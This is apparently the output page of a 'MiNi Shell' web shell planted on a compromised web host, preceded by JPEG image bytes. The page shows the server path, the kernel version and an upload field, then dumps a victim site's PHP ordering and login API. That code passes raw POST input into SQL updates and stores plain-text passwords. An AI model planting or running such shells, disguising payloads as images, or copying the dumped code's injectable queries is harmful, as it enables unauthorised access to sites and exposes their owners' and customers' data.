JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /hermes/bosnacweb04/bosnacweb04ac/b1072/ipg.liuyuan7592410/wb_moge/

Linux boscustweb5006.eigbox.net 5.4.91 #1 SMP Wed Jan 20 18:10:28 EST 2021 x86_64
Upload File :
Current File : /hermes/bosnacweb04/bosnacweb04ac/b1072/ipg.liuyuan7592410/wb_moge/storeAPI.bkup240826.php

<?PHP
	/**
	* version 1.0.1 2022-01-03
	* version 1.0.3 2022-01-06 getStoreList()增加对输入参数的判断。
	* 							屏蔽对$_SESSION["cur_pos_lat"]和$_SESSION["cur_pos_lng"]赋值
	* version 1.0.5 2022-01-09 增加sendLogVerifyCode消息。
	* version 1.0.7 2022-03-06 增加login的处理逻辑
	* version 1.0.9 2022-03-19 COOKIE添加了CUS_ID;
	* version 1.0.11 2023-05-21 增加reqStoreListOnly和updateStoreGeo消息处理
	* version 1.0.13 2023-08-28 客户sign in 成功返回值中增加了points信息。
	**/ 
	require_once(__DIR__."/lib/php/config.inc.php");
	require_once(__DIR__."/lib/php/add_to_cart.class.php");
	require_once(__DIR__."/lib/php/geo.php");
	require_once(__DIR__."/lib/php/coupon.class.php");
	$msg_type = get_safe_value($con,$_POST["msg_type"]);
	switch($msg_type){
		case "closestStore":
			if((!isset($_POST["lat"]))||(!isset($_POST["lng"]))){
				die(json_encode(["code"=>"103","description"=>"Invalid invoke the API. Lack of parameters"]));
			}else{
				$lat = get_safe_value($con,$_POST["lat"]);
				$lng = get_safe_value($con,$_POST['lng']);
				echo getClosestStoreFrDB($con,$lat,$lng);
			}
		break;
		case "storeList":
			if((!isset($_POST["lat"]))||(!isset($_POST["lng"]))){
				die(json_encode(["code"=>"103","description"=>"Invalid invoke the API. Lack of parameters"]));
			}else{
				$lat = get_safe_value($con,$_POST["lat"]);
				$lng = get_safe_value($con,$_POST['lng']);
				echo getStoreList($con,$lat,$lng);
			}
		break;
		case "setPickupStore":
			if(!isset($_POST["sid"])){
				die(json_encode(["code"=>"105","description"=>"set pickup store, no sid info"]));
			}else{
				$sid = get_safe_value($con,$_POST["sid"]);
				echo setPickupStore($con,$sid);
			}
		break;
		case "reqVerifyCode":
			if(!isset($_POST["cell_num"])){
				die(json_encode(["code"=>"106","description"=>"lack of cell phone number when request sending Login SMS!"]));
			}else{
				$cell_num = get_safe_value($con,$_POST["cell_num"]);
				$clnt = isset($_POST["clnt_name"])?get_safe_value($con,$_POST["clnt_name"]):NULL;
				$dob = isset($_POST["dob"])?get_safe_value($con,$_POST["dob"]):"00-00";
				echo reqVerifyCode($con,$cell_num,$clnt,$dob);
			}
		break;
		case "sendVerifyCode":
			if(!isset($_POST["veriCode"])){
				die(json_encode(["code"=>"107","description"=>"Lack of verify code"]));
			}else{
				$veri_code = get_safe_value($con,$_POST["veriCode"]);
				echo checkVerifyCode($con,$veri_code);
			}
		break;
		case "isNewCus":
			if(!isset($_POST["cell_num"])){
				die(json_encode(["code"=>"108","description"=>"No cell phone number received"]));
			}else{
				$cell_num = get_safe_value($con,$_POST["cell_num"]);
				echo checkNewCus($con,$cell_num);
			}
		break;
		case "logout_req":
			unset($_SESSION);
			cookie("TOKEN",0,-1);
			echo(json_encode(["code"=>"200","msg_type"=>"rsp_logout_req"]));
		break;
		case "applyCupnCard":
			if(!isset($_POST["coupon_code"])){
				die(json_encode(["code"=>"109","description"=>"No coupon code received!"]));
			}else if((!isset($_SESSION["CLNT_LOGIN"]))||(!isset($_SESSION["CUS_ID"]))){
				die(json_encode(["code"=>"110","description"=>"NOT SIGN IN YET! coockie:".$_SESSION["CUS_ID"]]));
			}else if(!isset($_COOKIE['pickupSID'])){
				die(json_encode(["code"=>"111","description"=>"Please select pickup store first!"]));
			}else{
				$cupn_card_code = get_safe_value($con,$_POST["coupon_code"]);
				$cupn_card_key = substr($cupn_card_code,0,1);
				$arr = explode("-",$cupn_card_code);
				switch($arr[0]){
					case COUPON:
   						$coupon = $arr[1];
   						echo appCoupon($con,$coupon,$_SESSION["CUS_ID"],$_COOKIE['pickupSID']);
   					break;
   					default:
   						echo appCard($con,$arr);
				}			
			}
		break;
		case "updateUsrProfile":
			echo updateProfile($con);			
		break;
		case "reqCupnCardRem":
			echo removeCupnCard($con);
		break;
		case "reqStoreListOnly":
			echo getStoreListOnly($con);
		break;
		case "updateStoreGeo":
			if(!isset($_POST['sid'])){
				die((["code"=>"115","description"=>"Tell me your store_id please!"]));
			}elseif((!isset($_POST['lat'])) || (!isset($_POST['lng']))){
				die(json_encode(["code"=>"114","description"=>"No GEO information received!"]));
			}
			echo update_store_geo($con,$_POST['sid'],$_POST['lat'],$_POST['lng']);
		break;
		default:
			die(json_encode(["code"=>"102","rcvd_msg"=>$msg_type,"description"=>"invalid message type"]));
	}

	/**
	* 更新store地理位置信息
	**/
	function update_store_geo($con,$store_id,$lat,$lng){
		$sql = "update t_store set lat='$lat',lng='$lng' where id=$store_id";
		mysqli_query($con,$sql);
		$updated_lines = mysqli_affected_rows($con);
		return json_encode(["code"=>"200","msg_type"=>"rsp_updateStoreGeo","store_id"=>$store_id,"updateLines"=>$updated_lines]);
	}

	function getStoreListOnly($con){
		$storeList = [];
		$sql = "select id,vid,name from t_store order by id asc";
		$res = mysqli_query($con,$sql);
		$i=0;
		while($row = mysqli_fetch_assoc($res)){
			$storeList[$i]["id"]=$row['id'];
			$storeList[$i]["vid"]=$row["vid"];
			$storeList[$i]["name"]=$row["name"];
			$i++;
		}
		return json_encode(["code"=>"200","msg_type"=>"rsp_reqStoreListOnly","storeList"=>$storeList]);
	}


	/**
	 * 获取距离指定地点距离最近的店的信息。
	 **/
	function getClosestStoreFrDB($con,$lat,$lng){
		/*$_SESSION["cur_pos_lat"]=$lat;
		$_SESSION['cur_pos_lng']=$lng;*/
		$sql = "select * from t_store where status=".ALL_ACTIVE;

		$res = mysqli_query($con,$sql);
		$closestDis= -1;
		$closestStore = [];

		while($row = mysqli_fetch_assoc($res)){
			$cur_dis = getDistance($lat,$lng,$row["lat"],$row["lng"]);
			if(($cur_dis<$closestDis)||($closestDis== -1)){
				$closestStore = $row;
				$closestStore["distance"]=$cur_dis;
				$closestDis = $cur_dis;
			}
		}
		return json_encode(["code"=>"200","msg_type"=>"rsp_closestStore","store_id"=>$closestStore["id"],"storeName"=>$closestStore["name"],"address"=>$closestStore["address"].", ".$closestStore["city"].", ".$closestStore["PC"],"distance"=>$closestStore["distance"]]);
	}


	/**
	 * 根据指定点与所有店面距离的远近,获取所有店面的列表,距离近的排在前面
	 **/
	function getStoreList($con,$lat,$lng){
		$storeList = getStoreArray($con,$lat,$lng);

		return json_encode(["code"=>"200","msg_type"=>"rsp_storeList","storeList"=>$storeList]);
	}

	/**
	 * 设置取餐店面:设置_COOKIE['pickupSID'];返回取餐店面的信息。
	 **/
	function setPickupStore($con,$sid){
		$sql = "select * from t_store where id=".$sid." and status=".ALL_ACTIVE;
		$res = mysqli_query($con,$sql);

		if(mysqli_num_rows($res) == 0){
			return json_encode(["code"=>"104","description"=>"Invalid store ID"]);
		}else{
			$row = mysqli_fetch_assoc($res);
			//$_SESSION['pickupSID'] = $sid;
			cookie("pickupSID",$sid,31536000);
			return json_encode(["code"=>"200","msg_type"=>"rsp_setPickupStore","store_id"=>$row["id"],"storeName"=>$row["name"],"address"=>$row["address"].", ".$row["city"].", ".$row["PC"],"lat"=>$row["lat"],"lng"=>$row["lng"]]);
		}
	}

	function reqVerifyCode($con,$cell_num,$cln_name=NULL,$dob=NULL){
		$sql = "select * from t_users where mobile='$cell_num'";
		$_SESSION['MY_CELL'] = $cell_num;
		$res = mysqli_query($con,$sql);

		$retn = ["code"=>"200",
				"msg_type"=>"rsp_reqVerifyCode",
				"cell_num"=>$cell_num,
				"AS"=>"existed"];
		if(mysqli_num_rows($res) == 0){
			/*new phone number.*/
			$cus_id = createNewCusID($con);
			$ref_by = isset($_SESSION['ref'])?($_SESSION['ref']):"000000000";
			$sql = "insert into t_users (cus_ID,name,dob,type,mobile,ref_by) values ('$cus_id','$cln_name','$dob','".USER_ROLE_CLIENT."','$cell_num','$ref_by')";
			$res = mysqli_query($con,$sql);
			$init = getInitSet($con,$ref_by);
			$sql = "insert t_crd_pnt (cus_id,points,ref_pnt_times,ref_pnt_pcnt,ref_pnt_desc) values ('$cus_id','".$init["init_pnts"]."','".$init["ref_pnt_times"]."','".$init["ref_pnt_pcnt"]."','".$init["ref_pnt_desc"]."')";
			$res = mysqli_query($con,$sql);
			$retn['AS'] = "new"; 
			$retn['cus_id'] = $cus_id;
		}else{
			$row = mysqli_fetch_assoc($res);
			$retn['cus_id'] = $row["cus_ID"];
			if((isset($cln_name))&&(trim($cln_name)!="")){
				$sql = "update t_users set name='".$cln_name."' where cus_ID='".$row["cus_ID"]."'";		
				mysqli_query($con,$sql);
			}else{
				$cln_name = $row['name'];
			}
		}
		$ver_code = sendSMSLoginVerifyCode($con,$cell_num);
		$retn['cus_name']=$cln_name;
		$_SESSION['CUS_NAME']=$cln_name;
		$_SESSION['CUS_ID'] = $retn['cus_id'];
		$retn['pin_length'] = strlen($ver_code);
		return json_encode($retn);
	}

	//根据推荐人获取初始点数的设置方案,以及推荐方案。
	function getInitSet($con,$ref_by){
		$sql = "select t1.init_pnts,t1.ref_pnt_times,t1.ref_pnt_pcnt,t1.ref_pnt_desc from t_ref_defination3 t1 right join t_users t2 on t1.id=t2.ref_init_id where t2.cus_id='$ref_by'";
		$res = mysqli_query($con,$sql);
		$row = mysqli_fetch_assoc($res);
		return $row;
	}

	function checkVerifyCode($con,$veri_code){
		$retn = ["code"=>"200",
				"msg_type"=>"rsp_sendVerifyCode"];
		if($_SESSION['v_code']==$veri_code){
			$retn['veri_rslt']="success";
			cookie("MY_CELL", $_SESSION['MY_CELL'],31536000);
			cookie("CUS_ID",$_SESSION['CUS_ID'],31536000);
			$token = rand_digits(48);
			cookie("TOKEN",$token,31536000);
			$sql = "update t_users set token='".$token."' where mobile='".$_SESSION['MY_CELL']."'";
			$res = mysqli_query($con,$sql);
			$sql = "select points from t_crd_pnt where cus_id='".$_COOKIE['CUS_ID']."'";
			$res = mysqli_query($con,$sql);
			if(mysqli_num_rows($res)==0){
				$sql = "insert into t_crd_pnt (cus_id,points) values ('".$_COOKIE['CUS_ID']."',0)";
				$retn['pnts'] = 0;
			}else{
				$row = mysqli_fetch_assoc($res);
				$retn['pnts'] = $row['points'];
			}
			$retn['my_cell'] = $_COOKIE['MY_CELL'];
			$retn['cus_name'] = $_SESSION['CUS_NAME'];
			$retn['cus_ID'] = $_COOKIE['CUS_ID'];
		}else{
			$retn['veri_rslt'] = "failed";
		}

		return json_encode($retn);
	}

    /**
     * cus_ID格式是YYYYMMDDXXXX;每天最多接受9999个新手机号码
     * */
	function createNewCusID($con){
		return createID($con,"t_users","cus_ID",12);
	}

	function sendSMSLoginVerifyCode($con,$cell_num){
		$verify_code = rand_digits(6);
		$_SESSION['v_code'] = $verify_code;
		$sms_msg = "You MogeTee account login verification code is: ".$verify_code;
		$sql = "select item,value from t_sys_config where item='sms_sc' or item='sms_account_user' or item='sms_account_token'";
		$res = mysqli_query($con,$sql);
		$sms_sc = [];
		while($row = mysqli_fetch_assoc($res)){
			$sms_sc[$row["item"]] = $row["value"];
		}
		$sms_data = ["clientID"=>$sms_sc['sms_account_user'],
					 "token"=>$sms_sc['sms_account_token'],
					 "req_type"=>"send_sms_req",
					 "to"=>$cell_num,
					 "body"=>$sms_msg,
					 "msg_id"=>createSMSMsgID($con)];
		$res = requestPost($sms_sc['sms_sc'],json_encode($sms_data));

		$sql = "insert into t_sms_record (msg_id,send_to,msg) values ('".$sms_data["msg_id"]."','$cell_num','$sms_msg')";
		mysqli_query($con,$sql);
		return $verify_code;
	}

	function createSMSMsgID($con){
		return createID($con,"t_SMS_record","msg_id",13);
	}

	/**
	 * AS - Account Status
	 * */
	function checkNewCus($con,$cell_num){
		$sql = "select * from t_users where mobile='$cell_num'";
		$res = mysqli_query($con,$sql);
		$retn = ["code"=>"200",
				"msg_type"=>"rsp_isNewCus",
				"cell_num"=>$cell_num,
				"AS"=>"existed"];
		if(mysqli_num_rows($res) == 0){
			/*new phone number.*/
			$retn['AS'] = "new"; 
		}else{
			$row = mysqli_fetch_assoc($res);
			if(trim($row["name"])==""){
				$retn['AS'] = "new";
			} 
		}

		return json_encode($retn);
	}

	function appCoupon($con,$cupn_code,$cid,$sid){
		$cupn = new cupn($con,$cupn_code);
		$check = $cupn->checkAvailability($cid,$sid);
		if($check['valid']){
			$_SESSION['COUPON'] = $cupn->getCouponInfo();
			unset($_SESSION['CARD']);
			$retn = ["code"=>"200","msg_type"=>"rsp_applyCupnCard","coupon_code"=>$_SESSION['COUPON']['cupn_code']];
		}else{
			$retn = ["code"=>"112","description"=>"coupon invalid, error code:".$check["code"]];
		}

		return json_encode($retn);
	}

	function appCard($con,$info){
		switch($info[0]){
			case CARD_KEY_POINT:
				$card = new pointCard($con,$info[1]);
			break;
			case CARD_KEY_PERCENT:
				$card = new discountCard($con,$info[1],$info[2]);
			break;
			case CARD_KEY_CASH_VALUE:
				$card = new giftCard($con,$info[1],$_SESSION["CUS_ID"],$info[2]);
				break;
		}
		if($card->isValidToUse()){
			$_SESSION['CARD']=$card->getCardInfo();
			unset($_SESSION['COUPON']);
			$retn = ["code"=>"200","msg_type"=>"rsp_applyCupnCard","crd_id"=>$_SESSION['CARD']["crd_id"]];
		}else{
			$retn = ["code"=>"113","description"=>"Invalid to use the card."];
		}
		return json_encode($retn);
	}

	function updateProfile($con){
		$set_val ="";
		$data = [];
		if($_SESSION["CLNT_LOGIN"]){
			if(isset($_POST["name"])){
				$_SESSION['CNT_NAME'] = get_safe_value($con,$_POST["name"]);
				$set_val .= ",name='".$_SESSION['CNT_NAME']."'";
				$data["name"] = $_SESSION['CNT_NAME'];
			}
			if(isset($_POST["email"])){
				$set_val .= ",email='".get_safe_value($con,$_POST["email"])."'";
				$data["email"] = get_safe_value($con,$_POST["email"]);
			}
			if(isset($_POST["password"])){
				$set_val .= ",password='".get_safe_value($con,$_POST["password"])."'";
				$data["password"] = "password changed";
			}
			$set_val = substr($set_val,1);

			$sql = "update t_users set ".$set_val." where cus_ID='".$_SESSION["CUS_ID"]."'";
			mysqli_query($con,$sql);
			$retn = json_encode(["code"=>"200","msg_type"=>"rsp_updateUsrProfile","data"=>$data]);
		}else{
			$retn = json_encode(["code"=>"113","description"=>"Please login first! Then you can update profile information."]);
		}

		return $retn;
	}

	function removeCupnCard($con){
		unset($_SESSION['COUPON']);
		unset($_SESSION['CARD']);
		return json_encode(["code"=>"200","msg_type"=>"rsp_reqCupnCardRem"]);
	}
?>

Creat By MiNi SheLL
Email: devilkiller@gmail.com